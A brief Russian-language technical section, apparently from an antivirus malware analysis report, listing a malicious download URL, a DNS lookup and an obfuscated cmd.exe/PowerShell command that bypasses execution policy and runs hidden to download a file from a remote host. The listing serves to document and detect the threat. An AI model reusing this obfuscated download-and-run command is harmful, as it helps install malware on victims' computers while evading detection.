Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^E^r^s^H^ell.E^XE^ -E^Xe^CuTIO^n^pOL^IcY ^By^pAS^s -no^Pr^O^FilE -W^in^doWs^T^yL^E^ ^Hi^DdE^n^ (N^e^W-^Obj^eCt syst^Em.NeT.wEBcl^Ien^T).d^oWn^L^OaDFilE('http://bestflo...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "p^OW^E^r^s^H^ell.E^XE^ -E^Xe^CuTIO^n^pOL^IcY ^By^pAS^s -no^Pr^O^FilE -W^in^doWs^T^yL^E^ ^Hi^DdE^n^ (N^e^W-^Obj^eCt syst^Em.NeT.wEBcl^Ien^T).d^oWn^L^OaDFilE('http://bestflo...' (со скрытым окном)